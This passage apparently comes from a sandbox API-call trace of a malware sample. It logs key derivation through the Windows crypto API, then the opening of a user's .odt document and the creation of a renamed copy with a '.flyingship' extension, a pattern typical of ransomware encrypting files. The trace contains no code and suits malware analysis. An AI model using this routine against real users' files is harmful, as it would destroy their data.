lpsz="_CRYPT_STARTUP") returned 0xe [0179.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.009] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.009] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0179.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.009] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0179.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0179.009] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.009] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.009] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0179.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.009] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0179.010] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.010] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.010] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0179.010] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.010] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.011] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.011] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0179.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.011] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.011] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.011] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.011] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.011] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.011] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.012] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.012] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.012] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.012] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.012] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.012] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.012] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.012] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.013] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.013] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.013] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0179.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.013] CryptDestroyHash (hHash=0x90ae18) returned 1 [0179.013] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.013] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.013] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.013] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.013] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\hivdx.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.014] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.014] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0179.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0179.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0179.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0179.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.014] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0179.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0179.015] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0179.015] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0179.016] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm")) returned 0x10 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0179.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0179.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0179.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0179.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.flyingship.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\hivdx.flyingship.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0179.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0179.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0179.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.018] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0179.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0179.018] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0179.018] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0179.018] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0179.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 